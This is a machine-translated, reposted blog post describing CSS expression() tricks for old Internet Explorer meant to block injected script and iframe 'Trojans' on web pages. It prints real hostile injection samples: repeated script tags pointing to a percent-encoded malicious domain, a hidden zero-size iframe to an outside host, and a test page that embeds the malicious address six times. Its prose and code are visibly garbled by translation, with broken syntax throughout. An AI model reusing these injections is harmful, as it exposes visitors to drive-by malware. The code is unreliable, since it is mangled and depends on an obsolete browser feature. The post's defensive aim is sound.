Two lines of code solve all webpage Trojans (including IFRAME/script Trojans) (zt)

It's still a matter of hanging horses. During this period of time, I gradually felt a lot of pressure. I 've been adding more and more people via QQ or MSN, and my work has been very busy recently. Ah, think about it. You still have to take the time to help you.

Not long ago, http://bbs.blueidea.com/thread-2818052-1-1.htmlCodeSolutions to IFRAME Trojans (including server injection and client ARP injection) have been recognized by many friends. This is indeed a good way to avoid the storm. But now the network-mounted Trojan method has changed as I expected. Now, Trojans and Trojans are popular, after reading the websites of a few netizens, they are added to the top or bottom of the page:

Note: The following addresses contain Trojans, so do not access them easily:

Copy content to clipboard Code: <SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

Sweating, inserting n identical <SCRIPT> tags in a row. Even if any patch is installed on the computer, visit the http: // % 76% 63% 63% 64% 63% 2e % 6e (or directly use thunder to download the patch ~ Now:

Copy content to clipboard Code: Document. Write ("<Div style = 'display: none'> ")
Document. Write ("<IFRAME src = http://a.158dm.com/b1.htm? Id = 017 width = 0 Height = 0> </iframe> ")
Document. Write ("</div> ")

Download ghost again with thunder. The charge is quite high!

Copy content to clipboard Code: ...
VaR kfqq, qqs = "[color = Magenta] 784378237 [/color]"; qwfgsg = "llll \ xxxxxld"; kfqq = qqs;
(... Omitted) (there are n statistical JS codes below ).

I can't ignore the above situation. Think of a solution, bro. I drank a bowl of green bean porridge, put a lot of sugar, good to drink. Thought of the solution. The answer is obtained through a slight analysis. Let's take a look at the features of <SCRIPT> Trojans:

<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>

By the way, the SRC of the script Trojan is generally from an external domain, that is, the SRC is headers with HTTP. If it is a script of your website, HTTP is not required. Then, let's look at the original form of the Trojan, it also outputs IFRAME, JS Code, or other <Object> code, no matter how many, how much to kill.

Let's write CSS with me and solve them one by one. I wrote five different solutions. Let's test them:

Solution 1:

Copy content to clipboard Code: IFRAME {n1ifm: expression (this. src = 'about: blank ', this. outerhtml = '');}/* this line of code solves the problem of hanging IFRAME Trojans */
Script {nojs1: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Write ('Trojan is isolated successfully! '):'');}

Principle: Convert the <SCRIPT>-marked SRC file to lowercase, and check whether it is an external domain JS script file starting with "HTTP". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.
Disadvantage: the visitor cannot see the page infected with the <SCRIPT> Trojan.

Solution 2:

Copy content to clipboard Code: IFRAME {nifm2: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {no2js: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document. Close ():'');}

Principle: Force disable document. Write () of JS files in external domains using document. Close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.

Solution 3:

Copy content to clipboard Code: IFRAME {ni3fm: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {n3ojs: expression (this. SRC. tolowercase (). indexof ('http') = 0 )? Document.exe ccommand ('stop '):'');}

Principle: The same as the JS file to the external domain, immediately call the IE private Execcommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just Like clicking the "stop" button in the browser. It seems that this is a method for js to simulate the ie stop button.

Solution 4:

Copy content to clipboard Code: IFRAME {nif4m: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj4s: expression (if (this. SRC. indexof ('HTTP ') = 0) This. src = 'res: // ieframe. dll/dnserror.htm ');}

Principle: overwrite the SRC of the JS file in the external domain to the address of the ie404 error page. In this way, the JS Code in the external domain will not be downloaded.

Solution 5:

Copy content to clipboard Code: IFRAME {nifm5: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {noj5s: expression (this. Id. tolowercase (). indexof ('lh ') = 0 )? Document. Write ('Trojan is isolated successfully! '):''));}

Page HTML of solution 5Source code<SCRIPT> to add an ID prefixed with "LH", such as lhweatherjsapi, <SCRIPT src = "***/**. JS "id =" lhsearchjsapi "> </SCRIPT>

The Code on the following page contains a trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it!(This test is dangerous. Make sure all patches are installed before testing)

Copy content to clipboard Code: <! Doctype HTML public "-// W3C // dtd xhtml 1.0 transitional // en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/CSS" id = "linrstudio">
/* <! [CDATA [*/
IFRAME {nhk1: expression (this. src = 'about: blank ', this. outerhtml = '');}
Script {ngz1: expression (this. SRC. indexof ('http') = 0 )? Document. Close ():'');}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<SCRIPT type = "text/JavaScript" src = "1.js"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
<SCRIPT src = "http: // % 76% 63% 63% 64% 2e % 63% 6e" type = "text/JavaScript"> </SCRIPT>
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am page 1
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I'm from page 2
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
I am 3 of the page itself
<SCRIPT src = http: // % 76% 63% 63% 64% 2e % 63% 6e> </SCRIPT>
</Body>
</Html>

Among them, 1. JS is on its own site:

Copy content to clipboard Code: Document. Write ("I Am a JS file on this site ");
Document. Write (" ");

.